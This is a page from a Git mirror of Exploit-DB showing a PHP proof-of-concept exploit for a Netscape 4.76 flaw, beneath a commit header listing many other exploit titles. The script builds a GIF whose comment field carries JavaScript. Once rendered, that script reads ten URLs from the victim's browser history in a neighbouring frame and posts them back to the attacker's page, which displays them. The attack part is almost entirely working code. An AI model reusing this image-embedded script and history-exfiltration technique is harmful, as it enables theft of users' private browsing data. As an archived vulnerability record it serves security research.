bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/remote/20791.php
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

154 lines
No EOL
6.3 KiB
PHP
Raw Blame History

source: https://www.securityfocus.com/bid/2637/info
Due to a flaw in Navigator's security code, all URLs in the about: protocol are considered to be part of the same domain.
If arbitrary Javascript code is placed in a GIF's comment field, it is treated like a normal HTML page. The Javascript code will run from the image information page in the internal about: 'domain'. This issue has also been reported in commented JPEG files.
<?
/*
Netscape 4.76 gif comment flaw
Florian Wesch <fw@dividuum.de>
http://dividuum.de
*/
$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
if (strlen($self)>64) {
echo "Url of $self is too long. 64 maximum.<br>";
echo "You can change this but I think 64 should be enough for anybody ;-)";
exit;
}
if (!isset($mode)) $mode="intro";
// If urllist is submitted
if (isset($u)) $mode="showhist";
switch ($mode) {
case "intro":
?>
<html>
<body>
<a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
</body>
</html>
<?
break;
case "frameset":
?>
<html>
<frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
<frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
<frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
</frameset>
</html>
<?
break;
case "loadhistory":
// replaces the current document with about:global using javascript
?>
<html>
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
</html>
<?
break;
case "showimageinfo":
?>
<html>
<head>
<meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
</head>
<body>
Waiting 5 seconds...<br>
<img src="<? echo $self; ?>?mode=evilgif">
</body>
</html>
<?
break;
case "evilgif":
// Gifs are supposed to be compressed. The program I
// used sucks :-)
header("Content-type: image/gif");
$gif ="4749463839610a000a00f70000ffffffffffccffff";
$gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
$gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
$gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
$gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
$gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="ffffffffffffffffffffffff0000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000000021feff";
$gif.=bin2hex(sprintf("%77s%s",
/*"<form action=".$self,' target=_parent name=s method=get >'.*/
/* I'm using POST so the submitted urls do not appear in the logfile */
"<form action=".$self,' target=_parent name=s method=post>'.
'<input name=u>'.
'</form>'.
'<script>'.
'f=parent.frames["foo"].document;'.
'l="";'.
/*'for(i=0;i<f.links.length;i++)'.*/
'for(i=0;i<10 ;i++)'.
'l+=f.links[i]+"|";'.
'document.s.u.value=l;'.
'document.'.chr(255).'s.submit();'.
'</script>'));
$gif.= "00000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000002c000000000a000a00000813004708";
$gif.="1c48b0a0c18308132a5cc8b061c28000003b";
echo pack("H".strlen($gif), $gif);
break;
case "showhist":
$urls=explode("|",$u);
echo "<h1>Top 10 urls in about:global</h1>";
foreach ($urls as $url) {
echo "<a href=$url>$url</a><br>";
}
};
?>
Reference in a new issue View git blame Copy permalink